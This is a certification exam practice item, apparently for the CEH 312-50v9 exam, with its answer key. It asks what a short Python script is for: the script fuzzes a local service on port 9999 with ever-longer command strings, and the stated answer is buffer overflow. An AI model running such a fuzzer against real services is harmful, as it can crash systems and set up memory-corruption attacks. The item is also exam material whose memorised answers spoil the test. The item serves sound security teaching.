EC-Council
312-50V9 Question #333: Real Exam Question with Answer & Explanation
The correct answer is A: Buffer Overflow. This Python script is a buffer overflow fuzzer that sends progressively larger payloads to multiple commands on a target service to identify which input causes a memory boundary violation.
Question
What is the code written for?

```python
#!/usr/bin/python
import socket

buffer=["A"]
counter=50
while len(buffer)<=100:
    buffer.append("A"*counter)
    counter=counter+50

commands=["HELP","STATS.","RTIME.","LTIME.","SRUN.","TRUN.","GMON.","GDOG.","KSTET.","GTER.","HTER.","LTER.","KSTAN."]

for command in commands:
    for buffstring in buffer:
        print "Exploiting" +command+":"+str(len(buffstring))
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('127.0.0.1',9999))
        s.recv(50)
        s.send(command+buffstring)
        s.close()
```
Options
- A. Buffer Overflow
- B. Encryption
- C. Bruteforce
- D. Denial-of-service (DoS)
Explanation
This Python script is a buffer overflow fuzzer that sends progressively larger payloads to multiple commands on a target service to identify which input causes a memory boundary violation.
Common mistakes.
- B. The script contains no cryptographic functions, key generation, or encoding/decoding logic associated with encryption.
- C. A brute-force attack cycles through possible credential combinations, whereas this script sends fixed repetitive characters ('A') of increasing length, which is fuzzing - not credential guessing.
- D. A denial-of-service attack aims to exhaust resources and disrupt availability, whereas this script targets memory safety vulnerabilities by sending oversized inputs to specific command handlers.
Concept tested. Buffer overflow fuzzing script identification
Reference. https://owasp.org/www-community/vulnerabilities/Buffer_Overflow